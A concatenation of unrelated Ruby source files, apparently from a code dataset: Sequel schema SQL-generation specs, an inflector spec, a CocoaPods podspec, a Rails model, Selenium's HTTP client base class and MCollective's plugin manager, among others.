@db.create_table(:cats) do
integer :a
integer :b
primary_key [:a, :b]
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, PRIMARY KEY (a, b))"]
end
specify "should accept named composite primary keys" do
@db.create_table(:cats) do
integer :a
integer :b
primary_key [:a, :b], :name => :cpk
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, CONSTRAINT cpk PRIMARY KEY (a, b))"]
end
specify "should accept composite foreign keys" do
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc)"]
end
specify "should accept named composite foreign keys" do
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :name => :cfk
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, CONSTRAINT cfk FOREIGN KEY (a, b) REFERENCES abc)"]
end
specify "should accept composite foreign keys with arbitrary keys" do
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :key => [:real_a, :real_b]
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc(real_a, real_b))"]
@db.sqls.clear
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :key => [:z, :x]
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc(z, x))"]
end
specify "should accept composite foreign keys with on delete and on update clauses" do
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :on_delete => :cascade
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc ON DELETE CASCADE)"]
@db.sqls.clear
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :on_update => :no_action
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc ON UPDATE NO ACTION)"]
@db.sqls.clear
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :on_delete => :restrict, :on_update => :set_default
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc ON DELETE RESTRICT ON UPDATE SET DEFAULT)"]
@db.sqls.clear
@db.create_table(:cats) do
integer :a
integer :b
foreign_key [:a, :b], :abc, :key => [:x, :y], :on_delete => :set_null, :on_update => :set_null
end
@db.sqls.should == ["CREATE TABLE cats (a integer, b integer, FOREIGN KEY (a, b) REFERENCES abc(x, y) ON DELETE SET NULL ON UPDATE SET NULL)"]
end
end
context "DB#create_table!" do
setup do
@db = SchemaDummyDatabase.new
end
specify "should drop the table and then create it" do
@db.create_table!(:cats) {}
@db.sqls.should == ['DROP TABLE cats', 'CREATE TABLE cats ()']
end
end
context "DB#drop_table" do
setup do
@db = SchemaDummyDatabase.new
end
specify "should generate a DROP TABLE statement" do
@db.drop_table :cats
@db.sqls.should == ['DROP TABLE cats']
end
end
context "DB#alter_table" do
setup do
@db = SchemaDummyDatabase.new
end
specify "should allow adding not null constraint" do
@db.alter_table(:cats) do
set_column_allow_null :score, false
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score SET NOT NULL"]
end
specify "should allow droping not null constraint" do
@db.alter_table(:cats) do
set_column_allow_null :score, true
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score DROP NOT NULL"]
end
specify "should support add_column" do
@db.alter_table(:cats) do
add_column :score, :integer
end
@db.sqls.should == ["ALTER TABLE cats ADD COLUMN score integer"]
end
specify "should support add_constraint" do
@db.alter_table(:cats) do
add_constraint :valid_score, 'score <= 100'
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT valid_score CHECK (score <= 100)"]
end
specify "should support add_constraint with block" do
@db.alter_table(:cats) do
add_constraint(:blah_blah) {(:x.sql_number > 0) & (:y.sql_number < 1)}
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT blah_blah CHECK ((x > 0) AND (y < 1))"]
end
specify "should support add_unique_constraint" do
@db.alter_table(:cats) do
add_unique_constraint [:a, :b]
end
@db.sqls.should == ["ALTER TABLE cats ADD UNIQUE (a, b)"]
@db.sqls.clear
@db.alter_table(:cats) do
add_unique_constraint [:a, :b], :name => :ab_uniq
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT ab_uniq UNIQUE (a, b)"]
end
specify "should support add_foreign_key" do
@db.alter_table(:cats) do
add_foreign_key :node_id, :nodes
end
@db.sqls.should == ["ALTER TABLE cats ADD COLUMN node_id integer REFERENCES nodes"]
end
specify "should support add_foreign_key with composite foreign keys" do
@db.alter_table(:cats) do
add_foreign_key [:node_id, :prop_id], :nodes_props
end
@db.sqls.should == ["ALTER TABLE cats ADD FOREIGN KEY (node_id, prop_id) REFERENCES nodes_props"]
@db.sqls.clear
@db.alter_table(:cats) do
add_foreign_key [:node_id, :prop_id], :nodes_props, :name => :cfk
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT cfk FOREIGN KEY (node_id, prop_id) REFERENCES nodes_props"]
@db.sqls.clear
@db.alter_table(:cats) do
add_foreign_key [:node_id, :prop_id], :nodes_props, :key => [:nid, :pid]
end
@db.sqls.should == ["ALTER TABLE cats ADD FOREIGN KEY (node_id, prop_id) REFERENCES nodes_props(nid, pid)"]
@db.sqls.clear
@db.alter_table(:cats) do
add_foreign_key [:node_id, :prop_id], :nodes_props, :on_delete => :restrict, :on_update => :cascade
end
@db.sqls.should == ["ALTER TABLE cats ADD FOREIGN KEY (node_id, prop_id) REFERENCES nodes_props ON DELETE RESTRICT ON UPDATE CASCADE"]
end
specify "should support add_index" do
@db.alter_table(:cats) do
add_index :name
end
@db.sqls.should == ["CREATE INDEX cats_name_index ON cats (name)"]
end
specify "should support add_primary_key" do
@db.alter_table(:cats) do
add_primary_key :id
end
@db.sqls.should == ["ALTER TABLE cats ADD COLUMN id integer PRIMARY KEY AUTOINCREMENT"]
end
specify "should support add_primary_key with composite primary keys" do
@db.alter_table(:cats) do
add_primary_key [:id, :type]
end
@db.sqls.should == ["ALTER TABLE cats ADD PRIMARY KEY (id, type)"]
@db.sqls.clear
@db.alter_table(:cats) do
add_primary_key [:id, :type], :name => :cpk
end
@db.sqls.should == ["ALTER TABLE cats ADD CONSTRAINT cpk PRIMARY KEY (id, type)"]
end
specify "should support drop_column" do
@db.alter_table(:cats) do
drop_column :score
end
@db.sqls.should == ["ALTER TABLE cats DROP COLUMN score"]
end
specify "should support drop_constraint" do
@db.alter_table(:cats) do
drop_constraint :valid_score
end
@db.sqls.should == ["ALTER TABLE cats DROP CONSTRAINT valid_score"]
end
specify "should support drop_index" do
@db.alter_table(:cats) do
drop_index :name
end
@db.sqls.should == ["DROP INDEX cats_name_index"]
end
specify "should support rename_column" do
@db.alter_table(:cats) do
rename_column :name, :old_name
end
@db.sqls.should == ["ALTER TABLE cats RENAME COLUMN name TO old_name"]
end
specify "should support set_column_default" do
@db.alter_table(:cats) do
set_column_default :score, 3
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score SET DEFAULT 3"]
end
specify "should support set_column_type" do
@db.alter_table(:cats) do
set_column_type :score, :real
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score TYPE real"]
end
specify "should support set_column_type with options" do
@db.alter_table(:cats) do
set_column_type :score, :integer, :unsigned=>true
set_column_type :score, :varchar, :size=>30
set_column_type :score, :enum, :elements=>['a', 'b']
end
@db.sqls.should == ["ALTER TABLE cats ALTER COLUMN score TYPE integer UNSIGNED",
"ALTER TABLE cats ALTER COLUMN score TYPE varchar(30)",
"ALTER TABLE cats ALTER COLUMN score TYPE enum('a', 'b')"]
end
end
context "Schema Parser" do
setup do
@sqls = []
@db = Sequel::Database.new
end
after do
Sequel.convert_tinyint_to_bool = true
end
specify "should raise an error if there are no columns" do
@db.meta_def(:schema_parse_table) do |t, opts|
[]
end
proc{@db.schema(:x)}.should raise_error(Sequel::Error)
end
specify "should parse the schema correctly for a single table" do
sqls = @sqls
proc{@db.schema(:x)}.should raise_error(Sequel::Error)
@db.meta_def(:schema_parse_table) do |t, opts|
sqls << t
[[:a, {:db_type=>t.to_s}]]
end
@db.schema(:x).should == [[:a, {:db_type=>"x"}]]
@sqls.should == ['x']
@db.schema(:x).should == [[:a, {:db_type=>"x"}]]
@sqls.should == ['x']
@db.schema(:x, :reload=>true).should == [[:a, {:db_type=>"x"}]]
@sqls.should == ['x', 'x']
end
specify "should parse the schema correctly for all tables" do
sqls = @sqls
proc{@db.schema}.should raise_error(Sequel::Error)
@db.meta_def(:tables){[:x]}
@db.meta_def(:schema_parse_table) do |t, opts|
sqls << t
[[:x, {:db_type=>t.to_s}]]
end
@db.schema.should == {'x'=>[[:x, {:db_type=>"x"}]]}
@sqls.should == ['x']
@db.schema.should == {'x'=>[[:x, {:db_type=>"x"}]]}
@sqls.should == ['x']
@db.schema(nil, :reload=>true).should == {'x'=>[[:x, {:db_type=>"x"}]]}
@sqls.should == ['x', 'x']
end
specify "should convert various types of table name arguments" do
@db.meta_def(:schema_parse_table) do |t, opts|
[[t, {:db_type=>t}]]
end
s1 = @db.schema(:x)
s1.should == [['x', {:db_type=>'x'}]]
@db.schema[:x].object_id.should == s1.object_id
@db.schema(:x.identifier).object_id.should == s1.object_id
@db.schema[:x.identifier].object_id.should == s1.object_id
s2 = @db.schema(:x__y)
s2.should == [['y', {:db_type=>'y'}]]
@db.schema[:x__y].object_id.should == s2.object_id
@db.schema(:y.qualify(:x)).object_id.should == s2.object_id
@db.schema[:y.qualify(:x)].object_id.should == s2.object_id
end
specify "should correctly parse all supported data types" do
@db.meta_def(:schema_parse_table) do |t, opts|
[[:x, {:type=>schema_column_type(t.to_s)}]]
end
@db.schema(:tinyint).first.last[:type].should == :boolean
Sequel.convert_tinyint_to_bool = false
@db.schema(:tinyint, :reload=>true).first.last[:type].should == :integer
@db.schema(:interval).first.last[:type].should == :interval
@db.schema(:int).first.last[:type].should == :integer
@db.schema(:integer).first.last[:type].should == :integer
@db.schema(:bigint).first.last[:type].should == :integer
@db.schema(:smallint).first.last[:type].should == :integer
@db.schema(:character).first.last[:type].should == :string
@db.schema(:"character varying").first.last[:type].should == :string
@db.schema(:varchar).first.last[:type].should == :string
@db.schema(:"varchar(255)").first.last[:type].should == :string
@db.schema(:text).first.last[:type].should == :string
@db.schema(:date).first.last[:type].should == :date
@db.schema(:datetime).first.last[:type].should == :datetime
@db.schema(:timestamp).first.last[:type].should == :datetime
@db.schema(:"timestamp with time zone").first.last[:type].should == :datetime
@db.schema(:"timestamp without time zone").first.last[:type].should == :datetime
@db.schema(:time).first.last[:type].should == :time
@db.schema(:"time with time zone").first.last[:type].should == :time
@db.schema(:"time without time zone").first.last[:type].should == :time
@db.schema(:boolean).first.last[:type].should == :boolean
@db.schema(:real).first.last[:type].should == :float
@db.schema(:float).first.last[:type].should == :float
@db.schema(:double).first.last[:type].should == :float
@db.schema(:"double precision").first.last[:type].should == :float
@db.schema(:numeric).first.last[:type].should == :decimal
@db.schema(:decimal).first.last[:type].should == :decimal
@db.schema(:money).first.last[:type].should == :decimal
@db.schema(:bytea).first.last[:type].should == :blob
end
end
| 33.665359 | 273 | 0.649297 |
4a1463cb672ec952cd686085cd38f0024b8fee1b | 1,580 | require File.dirname(__FILE__) + "/../spec_helper"
describe Inflector do
it "should camelize strings" do
Inflector.camelize("data_mapper").should == "DataMapper"
Inflector.camelize("data_mapper/support").should == "DataMapper::Support"
end
it "should pluralize strings" do
Inflector.pluralize("post").should == "posts"
Inflector.pluralize("octopus").should == "octopi"
Inflector.pluralize("sheep").should == "sheep"
Inflector.pluralize("word").should == "words"
Inflector.pluralize("the blue mailman").should == "the blue mailmen"
Inflector.pluralize("CamelOctopus").should == "CamelOctopi"
end
it "should singularize strings" do
Inflector.singularize("posts").should == "post"
Inflector.singularize("octopi").should == "octopus"
Inflector.singularize("sheep").should == "sheep"
Inflector.singularize("word").should == "word"
Inflector.singularize("the blue mailmen").should == "the blue mailman"
Inflector.singularize("CamelOctopi").should == "CamelOctopus"
end
it "should demodulize strings" do
Inflector.demodulize("DataMapper::Support").should == "Support"
end
it "should create foreign keys from class names and key names" do
Inflector.foreign_key("Animal").should == "animal_id"
Inflector.foreign_key("Admin::Post").should == "post_id"
Inflector.foreign_key("Animal", "name").should == "animal_name"
end
it "should constantize strings" do
Inflector.constantize("Class").should == Class
lambda { Inflector.constantize("asdf") }.should raise_error
end
end
| 37.619048 | 77 | 0.702532 |
267e31e2c50adb54cc6d5784b3b0615b043dba8c | 464 | module Embulk
require 'embulk/data_source'
class DecoderPlugin
def self.transaction(config, &control)
raise NotImplementedError, "DecoderPlugin.transaction(config, &control) must be implemented"
end
# TODO
# TODO new_java
def self.from_java(java_class)
JavaPlugin.ruby_adapter_class(java_class, DecoderPlugin, RubyAdapter)
end
module RubyAdapter
module ClassMethods
end
# TODO
end
end
end
| 17.846154 | 98 | 0.698276 |
287f3aab45a8e553ee76933756a799a63a8ca770 | 329 | require 'spec_helper'
require "paperclip/matchers"
RSpec.configure do |config|
config.include Paperclip::Shoulda::Matchers
end
describe Artifact do
it { should belong_to(:job) }
it { should validate_presence_of(:job) }
it { should have_attached_file(:asset) }
it { should validate_attachment_presence(:asset) }
end
| 20.5625 | 52 | 0.753799 |
08217a09bdf4f0e20a65175e90516a7912938227 | 612 | # frozen_string_literal: true
require "git_modified_lines"
require "rspec/core/memoized_helpers"
Dir[File.dirname(__FILE__) + "/support/**/*.rb"].sort.each { |f| require f }
RSpec.configure do |config|
config.include GitSpecHelpers
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = %i[expect should]
end
config.mock_with :rspec do |c|
c.syntax = %i[expect should]
end
end
| 25.5 | 76 | 0.735294 |
b93ddbb7e75cef97500f4c5b5f5732f6eb79fbbe | 480 | # frozen_string_literal: true
module ActiveRecordDataLoader
module ActiveRecord
class IntegerValueGenerator
class << self
def generator_for(model_class:, ar_column:, connection_factory: nil)
range_limit = [((256**number_of_bytes(ar_column)) / 2) - 1, 1_000_000_000].min
-> { rand(0..range_limit) }
end
private
def number_of_bytes(ar_column)
ar_column.limit || 8
end
end
end
end
end
| 21.818182 | 88 | 0.629167 |
1c7a9c2c17107b0b64bff188e4a1f39bed6c1692 | 5,407 | #
# Be sure to run `pod spec lint MapTungiFramework.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see https://guides.cocoapods.org/syntax/podspec.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |spec|
# βββ Spec Metadata ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
spec.name = "MapTungiFramework"
spec.version = "0.2.0"
spec.summary = "To integarte Map Tungi SDK with Club Mahindra App."
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
spec.description = <<-DESC
To integrate Map Tungi SDK with Club Mahindra App to Navigate the User in 2D Map.
DESC
spec.homepage = "https://github.com/kramesh2005new/MapTungiFrameworkSDK"
# spec.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# βββ Spec License βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# Licensing your code is important. See https://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
#spec.license = "MIT (example)"
spec.license = { :type => "MIT", :file => "LICENSE" }
# βββ Author Metadata βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
spec.author = { "Ramesh K" => "" }
# Or just: spec.author = "Ramesh K"
# spec.authors = { "Ramesh K" => "" }
# spec.social_media_url = "https://twitter.com/Ramesh K"
# βββ Platform Specifics βββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
# spec.platform = :ios
# spec.platform = :ios, "5.0"
spec.ios.deployment_target = "9.0"
spec.swift_version = "4.0"
# When using multiple platforms
# spec.ios.deployment_target = "5.0"
# spec.osx.deployment_target = "10.7"
# spec.watchos.deployment_target = "2.0"
# spec.tvos.deployment_target = "9.0"
# βββ Source Location ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
spec.source = { :git => "https://github.com/kramesh2005new/MapTungiFrameworkSDK.git", :tag => "#{spec.version}" }
# βββ Source Code ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
spec.source_files = "MapTungiFramework/**/*.{swift}"
#spec.exclude_files = "Classes/Exclude"
# spec.public_header_files = "Classes/**/*.h"
# βββ Resources ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# spec.resource = "icon.png"
spec.resources = "MapTungiFramework/**/*.{png,json,xib,html}"
# spec.preserve_paths = "FilesToSave", "MoreFilesToSave"
# βββ Project Linking ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# spec.framework = "SomeFramework"
# spec.frameworks = "SomeFramework", "AnotherFramework"
# spec.library = "iconv"
# spec.libraries = "iconv", "xml2"
# βββ Project Settings βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
# spec.requires_arc = true
# spec.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# spec.dependency "JSONKit", "~> 1.4"
spec.dependency "Zip", "~>1.1"
end
| 37.811189 | 121 | 0.604772 |
d5efd772c70c338bcfa4801c5ac73adaa34c734f | 3,423 | class Pmc::Criterio < ActiveRecord::Base
self.table_name = "#{CONFIG.bases.pez}.criterios"
has_many :peces_criterios, :class_name => 'Pmc::PezCriterio', :foreign_key => :criterio_id
has_many :peces, :through => :peces_criterios, :source => :pez
belongs_to :propiedad, :class_name => 'Pmc::Propiedad'
scope :select_propiedades, -> { select('criterios.id, nombre_propiedad') }
scope :select_join_propiedades, -> { select_propiedades.left_joins(:propiedad) }
scope :tipo_capturas, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::TIPO_CAPTURA_ID) }
scope :tipo_vedas, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::TIPO_DE_VEDA_ID) }
scope :procedencias, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::PROCEDENCIA_ID) }
scope :nom, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::NOM_ID) }
scope :iucn, -> { select_join_propiedades.where("ancestry=?", Pmc::Propiedad::IUCN_ID) }
scope :cnp, -> { select_join_propiedades.where("ancestry REGEXP '323/31[123456]$'").where("tipo_propiedad != 'estado'") }
scope :iucn_solo_riesgo, -> { iucn.where("propiedades.id IN (400,401,403,404,402)") } #Hardcodear estΓ‘ MAL, hay que evitarlo @calonsot#
validates_presence_of :valor
CON_ADVERTENCIA = ['Temporal fija', 'Temporal variable', 'Nacional e Importado'].freeze
def self.catalogo(prop = nil)
if prop.present?
resp = []
prop.siblings.map do |p|
next unless p.criterios.present?
if prop.descripcion.present?
resp << ["#{p.nombre_propiedad} - #{p.descripcion}", p.criterios.first.id]
else
resp << [p.nombre_propiedad, p.criterios.first.id]
end
end
resp
else
resp = Rails.cache.fetch('criterios_catalogo', expires_in: eval(CONFIG.cache.peces.catalogos)) do
grouped_options = {}
Pmc::Criterio.select(:id, :propiedad_id).group(:propiedad_id).each do |c|
prop = c.propiedad
next if prop.existe_propiedad?([Pmc::Propiedad::NOM_ID, Pmc::Propiedad::IUCN_ID])
llave_unica = prop.ancestors.map(&:nombre_propiedad).join('/')
grouped_options[llave_unica] = [] unless grouped_options.key?(llave_unica)
if prop.descripcion.present?
grouped_options[llave_unica] << ["#{prop.nombre_propiedad} - #{prop.descripcion}", c.id]
else
grouped_options[llave_unica] << [prop.nombre_propiedad, c.id]
end
end
grouped_options
end
resp
end
end
def self.cnp_select
cnp_options = ['Con potencial de desarrollo', 'MΓ‘ximo aprovechamiento permisible', 'En deterioro']
options = []
cnp_options.each do |c|
criterios = self.cnp.where('nombre_propiedad=?', c).map(&:id).join(',')
options << [c, criterios]
end
options
end
def self.dame_filtros
filtros = Rails.cache.fetch('filtros_peces', expires_in: eval(CONFIG.cache.peces.filtros)) do
{
grupos: Pmc::Propiedad.grupos_conabio,
zonas: Pmc::Propiedad.zonas,
tipo_capturas: self.tipo_capturas,
tipo_vedas: self.tipo_vedas,
procedencias: self.procedencias,
pesquerias: Pmc::Pez.filtros_peces.where(con_estrella: 1).distinct,
cnp: self.cnp_select,
nom: self.nom,
iucn: self.iucn_solo_riesgo
}
end
filtros
end
end | 34.928571 | 137 | 0.658779 |
aba004d2f57c3c0e95fa5ae239356194820acefb | 602 | namespace :test_track do
task :vendor_deps do
FileUtils.module_eval do
cd "vendor/gems" do
rm_r 'ruby_spec_helpers'
`git clone --depth=1 https://github.com/Betterment/ruby_spec_helpers.git && rm -rf ruby_spec_helpers/.git`
end
cd "vendor/gems/ruby_spec_helpers" do
rm_r(Dir.glob('.*') - %w(. ..))
rm_r Dir.glob('*.md')
rm_r %w(
Gemfile
Gemfile.lock
spec
), force: true
`sed -E -i.sedbak '/license/d' ruby_spec_helpers.gemspec`
rm_r Dir.glob('**/*.sedbak')
end
end
end
end
| 27.363636 | 114 | 0.571429 |
260a8cd03532a8ac3d3a185abe8024a445824666 | 206 | # frozen_string_literal: true
module Api
module V1
class HealthCheckController < BaseController
def index
render json: { message: 'Welcome to Fshare Tool' }
end
end
end
end
| 17.166667 | 58 | 0.669903 |
8757032254a94a059afdf754724de2ca4d05d219 | 216 | class CreateJoinTablePostsTopics < ActiveRecord::Migration[5.1]
def change
create_join_table :posts, :topics do |t|
# t.index [:post_id, :topic_id]
# t.index [:topic_id, :post_id]
end
end
end
| 24 | 63 | 0.671296 |
aca550118584e886668cbeb71dbec728d6043540 | 690 |
class Landslider
# search criteria for getLeads
class WsLeadSearch < WsSearch
# @return [Integer]
attr_writer :account_id, :company_id, :primary_owner_id, :status_id
# @return [Boolean]
attr_writer :hot
# @return [Date]
attr_writer :updated_on
# @return [String]
attr_writer :name
# @param [Handsoap::XmlMason::Node] msg
# @return [Handsoap::XmlMason::Node]
def soapify_for(msg)
super(msg)
msg.add 'name', @name unless @name.nil?
msg.add 'accountId', @account_id unless @account_id.nil?
msg.add 'companyId', @company_id unless @company_id.nil?
msg.add 'primaryOwnerId', @primary_owner_id unless @primary_owner_id.nil?
end
end
end
| 21.5625 | 76 | 0.7 |
1ca60eae24a85d664a735e151fa53dd2098dce3b | 2,386 | module Selenium
module WebDriver
module Remote
module Http
class Common
MAX_REDIRECTS = 20 # same as chromium/gecko
CONTENT_TYPE = "application/json"
DEFAULT_HEADERS = { "Accept" => CONTENT_TYPE }
attr_accessor :timeout
attr_writer :server_url
def initialize
@timeout = nil
end
def close
# hook for subclasses - will be called on Driver#quit
end
def call(verb, url, command_hash)
url = server_url.merge(url) unless url.kind_of?(URI)
headers = DEFAULT_HEADERS.dup
headers['Cache-Control'] = "no-cache" if verb == :get
if command_hash
payload = WebDriver.json_dump(command_hash)
headers["Content-Type"] = "#{CONTENT_TYPE}; charset=utf-8"
headers["Content-Length"] = payload.bytesize.to_s if [:post, :put].include?(verb)
if $DEBUG
puts " >>> #{url} | #{payload}"
puts " > #{headers.inspect}"
end
elsif verb == :post
payload = "{}"
headers["Content-Length"] = "2"
end
request verb, url, headers, payload
end
private
def server_url
@server_url or raise Error::WebDriverError, "server_url not set"
end
def request(verb, url, headers, payload)
raise NotImplementedError, "subclass responsibility"
end
def create_response(code, body, content_type)
code, body, content_type = code.to_i, body.to_s.strip, content_type.to_s
puts "<- #{body}\n" if $DEBUG
if content_type.include? CONTENT_TYPE
raise Error::WebDriverError, "empty body: #{content_type.inspect} (#{code})\n#{body}" if body.empty?
Response.new(code, WebDriver.json_load(body))
elsif code == 204
Response.new(code)
else
msg = "unexpected response, code=#{code}, content-type=#{content_type.inspect}"
msg << "\n#{body}" unless body.empty?
raise Error::WebDriverError, msg
end
end
end # Common
end # Http
end # Remote
end # WebDriver
end # Selenium
| 31.813333 | 114 | 0.532691 |
bb23a027e0a1b5b87cb55625e795205ea0e9f290 | 424 | module ImproveTypography
module Processors
class EmDash < Processor
REGEXP = /(\w+?)\s+-{1,3}\s+(\w+?)/i
def call
return str unless sign_exists?(em_dash_sign)
return str unless str.match?(/-{1,3}/)
str.gsub(REGEXP, '\1'+em_dash_sign+'\2')
end
private
def em_dash_sign
options.fetch(:em_dash_sign, translation(:em_dash_sign))
end
end
end
end
| 21.2 | 64 | 0.596698 |
261f84565e4d0e6f22191f53504043f2063ecc5b | 5,949 | module MCollective
# A simple plugin manager, it stores one plugin each of a specific type
# the idea is that we can only have one security provider, one connector etc.
module PluginManager
@plugins = {}
# Adds a plugin to the list of plugins, we expect a hash like:
#
# {:type => "base",
# :class => foo.new}
#
# or like:
# {:type => "base",
# :class => "Foo::Bar"}
#
# In the event that we already have a class with the given type
# an exception will be raised.
#
# If the :class passed is a String then we will delay instantiation
# till the first time someone asks for the plugin, this is because most likely
# the registration gets done by inherited() hooks, at which point the plugin class is not final.
#
# If we were to do a .new here the Class initialize method would get called and not
# the plugins, we there for only initialize the classes when they get requested via []
#
# By default all plugin instances are cached and returned later so there's
# always a single instance. You can pass :single_instance => false when
# calling this to instruct it to always return a new instance when a copy
# is requested. This only works with sending a String for :class.
def self.<<(plugin)
plugin[:single_instance] = true unless plugin.include?(:single_instance)
type = plugin[:type]
klass = plugin[:class]
single = plugin[:single_instance]
raise("Plugin #{type} already loaded") if @plugins.include?(type)
# If we get a string then store 'nil' as the instance, signalling that we'll
# create the class later on demand.
if klass.is_a?(String)
@plugins[type] = {:loadtime => Time.now, :class => klass, :instance => nil, :single => single}
Log.debug("Registering plugin #{type} with class #{klass} single_instance: #{single}")
else
@plugins[type] = {:loadtime => Time.now, :class => klass.class, :instance => klass, :single => true}
Log.debug("Registering plugin #{type} with class #{klass.class} single_instance: true")
end
end
# Removes a plugim the list
def self.delete(plugin)
@plugins.delete(plugin) if @plugins.include?(plugin)
end
# Finds out if we have a plugin with the given name
def self.include?(plugin)
@plugins.include?(plugin)
end
# Provides a list of plugins we know about
def self.pluginlist
@plugins.keys.sort
end
# deletes all registered plugins
def self.clear
@plugins.clear
end
# Gets a plugin by type
def self.[](plugin)
raise("No plugin #{plugin} defined") unless @plugins.include?(plugin)
klass = @plugins[plugin][:class]
if @plugins[plugin][:single]
# Create an instance of the class if one hasn't been done before
if @plugins[plugin][:instance].nil?
Log.debug("Returning new plugin #{plugin} with class #{klass}")
@plugins[plugin][:instance] = create_instance(klass)
else
Log.debug("Returning cached plugin #{plugin} with class #{klass}")
end
@plugins[plugin][:instance]
else
Log.debug("Returning new plugin #{plugin} with class #{klass}")
create_instance(klass)
end
end
# use eval to create an instance of a class
def self.create_instance(klass)
eval("#{klass}.new") # rubocop:disable Security/Eval, Style/EvalWithLocation
rescue Exception => e # rubocop:disable Lint/RescueException
raise("Could not create instance of plugin #{klass}: #{e}")
end
# Finds plugins in all configured libdirs
#
# find("agent")
#
# will return an array of just agent names, for example:
#
# ["puppetd", "package"]
#
# Can also be used to find files of other extensions:
#
# find("agent", "ddl")
#
# Will return the same list but only of files with extension .ddl
# in the agent subdirectory
def self.find(type, extension="rb")
extension = ".#{extension}" unless extension =~ /^\./
plugins = []
Config.instance.libdir.each do |libdir|
plugdir = File.join([libdir, "mcollective", type.to_s])
next unless File.directory?(plugdir)
Dir.new(plugdir).grep(/#{extension}$/).map do |plugin|
plugins << File.basename(plugin, extension)
end
end
plugins.sort.uniq
end
# Finds and loads from disk all plugins from all libdirs that match
# certain criteria.
#
# find_and_load("pluginpackager")
#
# Will find all .rb files in the libdir/mcollective/pluginpackager/
# directory in all libdirs and load them from disk.
#
# You can influence what plugins get loaded using a block notation:
#
# find_and_load("pluginpackager") do |plugin|
# plugin.match(/puppet/)
# end
#
# This will load only plugins matching /puppet/
def self.find_and_load(type, extension="rb")
extension = ".#{extension}" unless extension =~ /^\./
klasses = find(type, extension).map do |plugin|
next if block_given? && !yield(plugin)
"%s::%s::%s" % ["MCollective", type.capitalize, plugin.capitalize]
end.compact
klasses.sort.uniq.each {|klass| loadclass(klass, true)}
end
# Loads a class from file by doing some simple search/replace
# on class names and then doing a require.
def self.loadclass(klass, squash_failures=false)
fname = "#{klass.gsub('::', '/').downcase}.rb"
Log.debug("Loading #{klass} from #{fname}")
load fname
